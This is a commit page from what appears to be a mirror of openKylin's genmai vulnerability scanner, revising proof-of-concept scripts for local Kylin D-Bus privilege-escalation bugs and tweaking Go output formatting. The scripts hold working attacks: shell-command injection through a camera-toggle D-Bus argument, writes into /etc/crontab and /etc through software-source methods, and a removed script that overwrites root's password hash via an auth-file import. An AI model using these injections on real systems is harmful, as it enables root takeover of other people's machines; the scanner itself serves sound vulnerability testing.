openkylin
/
genmai
mirror of https://gitee.com/openkylin/genmai.git
9
0
Fork 0
Code Issues Projects Releases Wiki Activity

修改system poc && 修改输出格式

This commit is contained in:
song 2023-02-20 11:03:12 +08:00
parent eceb538dff
commit a353d42037
12 changed files with 40 additions and 34 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
data/SystemPocs/KVE-2022-0206/KVE-2022-0206.sh
View File

@ -1,3 +1,7 @@
#!/bin/bash
gdbus call --system --dest org.ukui.kds --object-path / --method org.ukui.kds.interface.toggleCameraDevice "1';id>/tmp/1.txt;'"
ls /tmp/1.txt
gdbus call --system --dest org.ukui.kds --object-path / --method org.ukui.kds.interface.toggleCameraDevice "1';id>/tmp/toggleCameraDevicTest.txt;'"
if ls /tmp/toggleCameraDevicTest.txt
then
gdbus call --system --dest org.ukui.kds --object-path / --method org.ukui.kds.interface.toggleCameraDevice "1';rm /tmp/toggleCameraDevicTest.txt;'"
echo 'succ'
fi

2
data/SystemPocs/KVE-2022-0206/KVE-2022-0206.yaml
View File

@ -40,5 +40,5 @@ SiteRequests:
# << 输入字符
# >?判断条件
Inter:
- ">?:/tmp/1.txt" #ture
- ">?:succ" #ture
Condition: None

8
data/SystemPocs/KVE-2022-0207/KVE-2022-0207.py
View File

@ -8,8 +8,12 @@ def change_source(old, new, target):
bus = dbus.SystemBus()
obj = bus.get_object("com.kylin.software.properties", "/com/kylin/software/properties")
proxy = dbus.Interface(obj, "com.kylin.software.properties.interface")
print(proxy.changedSource([old, new, target]))
result=proxy.changedSource([old, new, target])
change_source("#", "kylin666", "/etc/crontab")
os.system("grep -rn 'kylin666' /etc/crontab")
resulOs=os.popen("grep -rn 'kylin666' /etc/crontab")
if resulOs.read() :
print("succ")
else :
print("fail")
change_source("kylin666", "#", "/etc/crontab")

2
data/SystemPocs/KVE-2022-0207/KVE-2022-0207.yaml
View File

@ -40,5 +40,5 @@ SiteRequests:
# << 输入字符
# >?判断条件
Inter:
- ">?:None" #ture
- ">?:succ" #ture
Condition: None

11
data/SystemPocs/KVE-2022-0210/KVE-2022-0210.py
View File

@ -1,16 +1,15 @@
#!/usr/bin/env python3
import sys
import dbus
import os
def set_main_source(target_dir, src_file):
bus = dbus.SystemBus()
obj = bus.get_object("com.kylin.software.properties", "/com/kylin/software/properties")
proxy = dbus.Interface(obj, "com.kylin.software.properties.interface")
proxy.setMainSource([f'-t {target_dir} {src_file}'])
os.system('touch set_main_source.txt')
os.system('touch set_main_source.txt')
set_main_source("/etc", os.path.realpath('./set_main_source.txt'))
os.system('ls |grep set_main_source.txt')
os.system('rm set_main_source.txt')
result=os.popen('ls /etc/set_main_source.txt')
if result.read() :
print("succ")
os.system('rm set_main_source.txt')

4
data/SystemPocs/KVE-2022-0210/KVE-2022-0210.yaml
View File

@ -1,5 +1,5 @@
FormatVer: 20220411
Id: KVE-2022-0207
Id: KVE-2022-0210
Belong: system
PocHazardLevel: low
Source:
@ -40,5 +40,5 @@ SiteRequests:
# << 输入字符
# >?判断条件
Inter:
- ">?:set_main_source.txt" #ture
- ">?:succ" #ture
Condition: None

16
data/SystemPocs/KVE-2022-0231/KVE-2022-0231.sh
View File

@ -1,8 +1,8 @@
echo "[*] Trying to overwrite passwd file ..."
cp /etc/passwd /tmp/passwd
sed -i 's/root:x:0:0:root/root:\$1\$nrDGqnHa\$EhGl0D2EBPmnQTC2hGvgl.:0:0:root/g' /tmp/passwd
dbus-send --system --dest=org.freedesktop.activation /org/freedesktop/activation org.freedesktop.activation.interface.import_auth_file string:../tmp/passwd
sleep 1
dbus-send --system --dest=org.freedesktop.activation /org/freedesktop/activation org.freedesktop.activation.interface.import_auth_file string:../tmp/passwd
sleep 1
echo '[*] Try login with root / 123qwe!@#QWE'
#!/bin/bash
touch import_auth_file.txt
gdbus call --system --dest org.freedesktop.activation --object-path /org/freedesktop/activation --method org.freedesktop.activation.interface.import_auth_file "`pwd`/import_auth_file.txt"
rm import_auth_file.txt
if ls -l /etc/import_auth_file.txt
then
echo "succ"
fi

2
data/SystemPocs/KVE-2022-0231/KVE-2022-0231.yaml
View File

@ -41,5 +41,5 @@ SiteRequests:
# << 输入字符
# >?判断条件
Inter:
- ">?:" #ture
- ">?:succ" #ture
Condition: None

10
data/SystemPocs/SystemPocs.json
View File

@ -1,11 +1,11 @@
{
"ConfigFilePrefix": "/home/alpha/Developments/kylinprojects/genmai/data/pocs/",
"ConfigFilePrefix": "../data/SystemPocs/",
"ExplorerItems": [
{ "Type": "kernel",
"ConfigFile": "data/common/CVE-2021-3156.yaml"
{ "Type": "system",
"ConfigFile": "KVE-2022-0206/KVE-2022-0206.yaml"
},
{ "Type": "kernel",
"ConfigFile": "data/common/CVE-2021-3156-another.yaml"
{ "Type": "system",
"ConfigFile": "KVE-2022-0231/KVE-2022-0231.yaml"
}
]
}

4
src/genmai/ExplorerKernel.go
View File

@ -158,13 +158,13 @@ func
"\"" +
inter.INTERPRETER_CMD_RECV_POC_CHECK +
"\":" ,
"Check poc successfully!" )
config.Id+" "+"Check poc successfully!" )
/* */
return RC_POC_CHECK_SUCCESSFULLY
} else {
A_DEBUG_INFO("exploreWithPath():",
inter.INTERPRETER_CMD_RECV_POC_CHECK,
"Check poc failed!" )
config.Id+" "+"Check poc failed!" )
/* */
return RC_POC_CHECK_FAILED
}

7
src/genmai/ExplorerSystem.go
View File

@ -30,7 +30,7 @@ package genmai
import (
"os"
"fmt"
// "fmt"
sandbox "main/genmai/Sandbox"
inter "main/genmai/Interpreter"
)
@ -98,7 +98,6 @@ func
/* */
return rc
} // if (nil != ...
fmt.Println(config)
for _, itr := range config.SiteRequests.Implement.Inter {
icmd := itr[ : inter.INTERPRETER_CMD_LEN]
icmd_len := len(icmd)
@ -141,13 +140,13 @@ func
"\"" +
inter.INTERPRETER_CMD_RECV_POC_CHECK +
"\":" ,
"Check poc successfully!" )
config.Id+" "+"Check poc successfully!" )
/* */
return RC_POC_CHECK_SUCCESSFULLY
} else {
A_DEBUG_INFO("exploreWithPath():",
inter.INTERPRETER_CMD_RECV_POC_CHECK,
"Check poc failed!" )
config.Id+" "+"Check poc failed!" )
/* */
return RC_POC_CHECK_FAILED
}

BIN
src/main Executable file
View File

Binary file not shown.